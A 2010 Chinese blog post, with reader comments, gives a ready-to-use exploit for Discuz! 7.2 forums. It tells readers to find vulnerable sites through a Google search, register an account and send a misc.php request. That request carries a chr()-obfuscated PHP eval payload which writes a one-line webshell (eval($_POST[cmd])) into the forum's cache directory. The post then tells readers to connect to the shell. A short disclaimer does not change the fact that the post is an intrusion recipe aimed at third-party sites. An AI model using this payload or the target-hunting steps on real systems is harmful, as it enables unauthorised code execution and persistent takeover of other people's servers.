Discuz论坛 7.2 最新漏洞利用 - 朝气
当前位置: 首页 > 网络共享 > 正文

Discuz论坛 7.2 最新漏洞利用

提供入侵思路,非法入侵他人站点,一切后果与本人无关. 首先google 搜索 Powered by Discuz! 7.2 有很多 。
随便选一个,注册用户,然后提交exp 程序代码:
http://网站地址/misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]=${${eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(102).chr(111).chr(114).chr(117).chr(109).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(117).chr(115).chr(101).chr(114).chr(103).chr(114).chr(111).chr(117).chr(112).chr(95).chr(48).chr(49).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))}}
如果显示如下,没有提示 说明成功

然后php一句话连接

OK

转载请注明转自朝气 ,本文链接: http://www.gtsow.com/artices/258.html

该日志由 逝魂 于2010年01月07日发表在网络共享分类下,
您还可以在保留本文地址和作者的前提下转载到您的网站或空间。

Discuz论坛 7.2 最新漏洞利用:目前有4 条留言

  1. 个黄飞鸿

    2011-10-24 上午 9:44
  2. 支持咯!!

    2011-10-24 上午 9:43
  3. 板凳
    海天无影:

    我是立即去打了补丁

    2010-01-12 下午 12:19
  4. 沙发
    TONY:

    好多人都在说这个漏洞

    2010-01-07 下午 3:44